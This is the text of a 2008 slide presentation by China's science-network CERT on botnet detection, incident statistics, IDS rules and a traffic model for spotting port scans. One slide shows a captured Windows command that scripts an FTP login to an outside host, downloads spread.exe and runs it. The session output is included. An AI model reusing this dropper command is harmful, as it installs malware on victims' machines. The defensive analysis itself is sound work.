china science & technology network computer emergency response team botnet detection and network...

China Science & Technology Network Computer Emergency Response Team

Botnet Detection Botnet Detection and and

Network Security AlertNetwork Security AlertTao JING

[email protected],CNIC

(+86)-010-58812898

CANS 2008 Indiana University2008-10-21


Agenda

• About CSTCERT• About Botnet• Network Security Alert• Future work


CSTCERT Overview• Founded in 2002 , CSTCERT(China Science

and Technology Network Computer Emergency Response Team)

• CSTCERT is supervised by CSTNET.• Services:

– Incidents handling, include: attack ,complaints , abnormal traffic detect and other related security incidents

– research and development ：• Emergency Response

– Security training : http://cert.cstnet.cn :+86-010-58812935 : [email protected]


port scanni ng55%Brute f orce

29%

phi shi ng cheat9%

SQL I nj ect i on5%

address probe2%

Our work

• 2007.9 -2008.9 ,we have handled 266 security events.– security

incidents:205– security

complaints :61


Security status is very serious!-why?• You can become a

hacker very easily!– Know a little

knowledge– Search hacker method

from Internet– Many people share

their hacker tools– If you want to pay

some money, someone will teach you about hacker-tech.


About Botnet• A botnet is a collection of computers, connected to the

internet, that interact to accomplish some distributed task.• Botnet typically refers to such a system designed and used

for illegal purposes.• The compromised machines are referred to as drones or

zombies, the malicious software running on them as 'bot'.

From: www.shadowserver.org


Botnet can cause ?

and 。。。


How can we find Botnet?

• Active way:– Network protocol analysis

• IRC ()– monitor some special TCP

port(135/139/445/1433/22/2967……)– Check C&C(Command and Control Center)

server address update from internet• http://www.cyber-ta.org/• http://www.shadowserver.org

• Passive way:– honeypot


Main Character of Botnet

• IRC message– Port scan:advscan, asc…– File download:download– Others: ping/pong,join,mode…

• scan tcp port:135/139/445/1433/22/2967• Vulnerability that botnet always exploit

– Weak password (ssh/MS-SQL/windows)– Overflow

vulnerability(MS-SQL/windows/software)


the host was controled by this method-1Sometimes-use scan control command


the host was controled by this method-2Sometimes-install malware


C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21>appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exeftp> open spreadem.nowslate1703.info 21Connected to spreadem.nowslate1703.info.220---------- Welcome to Pure-FTPd [TLS] ----------220-You are user number 73 of 200 allowed.220-Local time is now 00:15. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 2 minutes of inactivity.ftp> user spread baby331 User spread OK. Password required230-User spread has group access to: spread230 OK. Current restricted directory is /ftp> binary200 TYPE is now 8-bit binaryftp> getRemote file spread.exeLocal file spread.exe200 PORT command successful150-Connecting to port 1555150 83.1 kbytes to download226-File successfully transferred226 0.750 seconds (measured here), 110.70 Kbytes per secondftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec.ftp> bye221-Goodbye. You uploaded 0 and downloaded 84 kbytes.221 Logout.C:\Documents and Settings\jackie>


Network security alertNetwork security alert -IDS/IPS rule• For port scan:Use some IRC

message word:asc/advscan • for network comunication with IRC:

Ping/Pong,JOIN,PRIVMSG ……


Rules for IDS


Network security alertNetwork security alert -Network traffic data analysis• We can build a simple mathematics model to

describe Network Traffic data by Numerical Analysis method (NTNA model)

21 wn

nw

c

cp

all

i

all

i

pw

n

n

c

c

p

i

all

i

all

i

in unit forward for the degreeeffect ofweight :

portn destinatio special for this amounts ip target unique theof all:

src_ip :ip source same thehas ip target theall

port,n destinatio special for this amounts ip target unique:

portn destinatio specil for thiscount theof all:

portn destinatio special for this src_ip thisofcount :

scanning is src_ip s think thiy that weprobabilit:

i

i

i

)...,...( 2121 nallnall nnnncccc


Data of tcp 1433 scan

Data of tcp 22 scan

Data of other port scan

。。。。。。

data of src ip data of counts amounts of target ip

Count_1

Count_2

。。。

Count_n

Count_1

Count_2

。。。

Count_n

Dst_ipsum_1

Dst_ipnsum_2

。。。

Dst_ipsum_n

Dst_ipsum_1

Dst_ipnsum_2

。。。

Dst_ipsum_n

Src_ip1

Src_ip2

。。。

Src_ipn

Src_ip1

Src_ip2

。。。

Src_ipn


NTNA model in practice


Future work

• Botnet research• Monitoring and countermeasure

for large-scale network worm • Some improvement for the NTNA

model

– accuracy amendment– Extension to larger scale network

traffic data (netflow) – Data mining


Thank you!

[email protected]

(+86)-010-58812898

china science & technology network computer emergency response team botnet detection and network...

Documents

honeypot slide

malware slide

cstcertchina science

network protocol analysis

scan control command

security complaints

security events

echo user